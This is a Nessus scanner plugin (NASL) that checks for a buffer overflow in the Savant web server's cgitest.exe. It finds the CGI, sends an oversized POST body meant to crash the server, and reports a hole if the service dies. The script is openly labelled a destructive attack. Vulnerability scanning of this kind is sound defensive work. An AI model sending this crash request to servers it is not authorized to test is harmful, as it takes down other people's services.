home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / savant_cgitest.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  86 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # GNU Public Licence
  5. #
  6. ########################
  7. # References:
  8. ########################
  9. # Date: Fri, 13 Sep 2002 19:55:05 +0000
  10. # From "Auriemma Luigi" <aluigi@pivx.com>
  11. # To: bugtraq@securityfocus.com
  12. # Subject: Savant 3.1 multiple vulnerabilities
  13. #
  14. ########################
  15.  
  16. if(description)
  17. {
  18.  script_id(11173);
  19.  script_bugtraq_id(5706);
  20.  script_version("$Revision: 1.10 $");
  21.  
  22.  name["english"] = "Savant cgitest.exe buffer overflow";
  23.  script_name(english:name["english"]);
  24.  
  25.  desc["english"] = "
  26. cgitest.exe from Savant web server is installed. This CGI is
  27. vulnerable to a buffer overflow which may allow a cracker to 
  28. crash your server or even run code on your system.
  29.  
  30. Risk factor : High
  31.  
  32. Solution : Upgrade your web server or remove this CGI.";
  33.  
  34.  script_description(english:desc["english"]);
  35.  
  36.  summary["english"] = "Savant cgitest.exe buffer overflow";
  37.  script_summary(english:summary["english"]);
  38.  
  39.  script_category(ACT_DESTRUCTIVE_ATTACK);
  40.  
  41.  
  42.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  43.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  44.  family["english"] = "CGI abuses";
  45.  
  46.  script_family(english:family["english"]);
  47.  script_dependencie("find_service.nes", "http_version.nasl");
  48.  script_require_ports("Services/www",80);
  49.  exit(0);
  50. }
  51.  
  52.  
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59. if (! get_port_state(port)) exit(0);
  60.  
  61.  
  62. foreach dir (cgi_dirs())
  63. {
  64.  p = string(dir, "/cgitest.exe");
  65.  if(is_cgi_installed_ka(item:p, port:port))
  66.  {
  67.  soc = http_open_socket(port);
  68.  if (! soc) exit(0);
  69.  
  70.  len = 256;    # 136 should be enough
  71.  req = string("POST ", p, " HTTP/1.0\r\nContent-Length: ", len,
  72.     "\r\n\r\n", crap(len), "\r\n");
  73.  send(socket:soc, data:req);
  74.  http_close_socket(soc);
  75.  
  76.  sleep(1);
  77.  
  78.  if(http_is_dead(port: port))
  79.  {
  80.   security_hole(port);
  81.   exit(0);
  82.   } 
  83.  }
  84. }
  85.